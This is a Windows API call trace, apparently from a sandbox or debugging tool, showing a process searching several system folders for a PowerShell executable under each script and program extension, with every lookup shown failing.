	[0507.995] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0507.995] SetErrorMode (uMode=0x1) returned 0x1
	[0507.995] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0507.995] SetErrorMode (uMode=0x1) returned 0x1
	[0507.995] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0507.995] SetErrorMode (uMode=0x1) returned 0x1
	[0507.996] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0507.996] SetErrorMode (uMode=0x1) returned 0x1
	[0507.996] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0507.996] SetErrorMode (uMode=0x1) returned 0x1
	[0507.996] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0507.996] SetErrorMode (uMode=0x1) returned 0x1
	[0507.996] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0507.997] SetErrorMode (uMode=0x1) returned 0x1
	[0507.997] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0507.997] SetErrorMode (uMode=0x1) returned 0x1
	[0507.997] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0507.997] SetErrorMode (uMode=0x1) returned 0x1
	[0507.997] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0507.997] SetErrorMode (uMode=0x1) returned 0x1
	[0507.998] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0507.998] SetErrorMode (uMode=0x1) returned 0x1
	[0507.998] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0507.998] SetErrorMode (uMode=0x1) returned 0x1
	[0507.999] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0507.999] SetErrorMode (uMode=0x1) returned 0x1
	[0507.999] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0507.999] SetErrorMode (uMode=0x1) returned 0x1
	[0507.999] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0507.999] SetErrorMode (uMode=0x1) returned 0x1
	[0507.999] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0508.000] SetErrorMode (uMode=0x1) returned 0x1
	[0508.000] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0508.000] SetErrorMode (uMode=0x1) returned 0x1
	[0508.000] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0508.000] SetErrorMode (uMode=0x1) returned 0x1
	[0508.000] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0508.001] SetErrorMode (uMode=0x1) returned 0x1
	[0508.001] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0508.001] SetErrorMode (uMode=0x1) returned 0x1
	[0508.001] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0508.001] SetErrorMode (uMode=0x1) returned 0x1
	[0508.001] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0508.002] SetErrorMode (uMode=0x1) returned 0x1
	[0508.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0508.002] SetErrorMode (uMode=0x1) returned 0x1
	[0508.002] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0508.002] SetErrorMode (uMode=0x1) returned 0x1
	[0508.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0508.003] SetErrorMode (uMode=0x1) returned 0x1
	[0508.003] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0508.003] SetErrorMode (uMode=0x1) returned 0x1
	[0508.003] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0508.003] SetErrorMode (uMode=0x1) returned 0x1
	[0508.003] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0508.003] SetErrorMode (uMode=0x1) returned 0x1
	[0508.004] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0508.004] SetErrorMode (uMode=0x1) returned 0x1
	[0508.004] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0508.004] SetErrorMode (uMode=0x1) returned 0x1
	[0508.004] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0508.004] SetErrorMode (uMode=0x1) returned 0x1
	[0508.005] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0508.005] SetErrorMode (uMode=0x1) returned 0x1
	[0508.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0508.005] SetErrorMode (uMode=0x1) returned 0x1
	[0508.005] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0508.005] SetErrorMode (uMode=0x1) returned 0x1
	[0508.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0508.006] SetErrorMode (uMode=0x1) returned 0x1
	[0508.006] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0508.006] SetErrorMode (uMode=0x1) returned 0x1
	[0508.006] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0508.006] SetErrorMode (uMode=0x1) returned 0x1
	[0508.006] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0508.007] SetErrorMode (uMode=0x1) returned 0x1
	[0508.007] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0508.007] SetErrorMode (uMode=0x1) returned 0x1
	[0508.007] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0508.007] SetErrorMode (uMode=0x1) returned 0x1
	[0508.007] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0508.008] SetErrorMode (uMode=0x1) returned 0x1
	[0508.008] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0508.008] SetErrorMode (uMode=0x1) returned 0x1
	[0508.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0508.008] SetErrorMode (uMode=0x1) returned 0x1
	[0508.008] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0508.009] SetErrorMode (uMode=0x1) returned 0x1
	[0508.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0508.009] SetErrorMode (uMode=0x1) returned 0x1
	[0508.009] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0508.009] SetErrorMode (uMode=0x1) returned 0x1
	[0508.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0508.009] SetErrorMode (uMode=0x1) returned 0x1
	[0508.010] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0508.010] SetErrorMode (uMode=0x1) returned 0x1
	[0508.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0508.010] SetErrorMode (uMode=0x1) returned 0x1
	[0508.020] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0508.020] SetErrorMode (uMode=0x1) returned 0x1
	[0508.020] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0508.020] SetErrorMode (uMode=0x1) returned 0x1
	[0508.020] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0508.021] SetErrorMode (uMode=0x1) returned 0x1
	[0508.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0508.021] SetErrorMode (uMode=0x1) returned 0x1
	[0508.021] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0508.021] SetErrorMode (uMode=0x1) returned 0x1
	[0508.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0508.022] SetErrorMode (uMode=0x1) returned 0x1
	[0508.022] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0508.022] SetErrorMode (uMode=0x1) returned 0x1
	[0508.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0508.022] SetErrorMode (uMode=0x1) returned 0x1
	[0508.022] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0508.022] SetErrorMode (uMode=0x1) returned 0x1
	[0508.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0508.023] SetErrorMode (uMode=0x1) returned 0x1
	[0508.023] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0508.023] SetErrorMode (uMode=0x1) returned 0x1
